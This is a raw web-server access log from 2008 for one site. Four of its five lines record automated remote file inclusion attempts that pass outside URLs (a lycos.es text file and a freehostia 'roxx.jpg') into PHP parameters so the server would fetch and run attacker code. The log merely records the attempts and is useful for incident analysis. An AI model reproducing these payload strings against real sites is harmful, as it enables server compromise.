69.79.51.225 - - [04/Nov/2008:11:52:27 -0800] "GET /logs/access_080425.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.174.158 - - [04/Nov/2008:11:52:31 -0800] "GET /logs/access_080510.log//index.php?option=http://rubi4.freehostia.com/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.174.158 - - [04/Nov/2008:11:52:32 -0800] "GET /index.php?option=http://rubi4.freehostia.com/roxx.jpg??? HTTP/1.1" 200 94688 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.174.158 - - [04/Nov/2008:11:52:33 -0800] "GET /logs//index.php?option=http://rubi4.freehostia.com/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.18.252 - - [04/Nov/2008:11:52:35 -0800] "GET /bikes/dteel/2008_10_18/?M=A HTTP/1.0" 200 1116 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
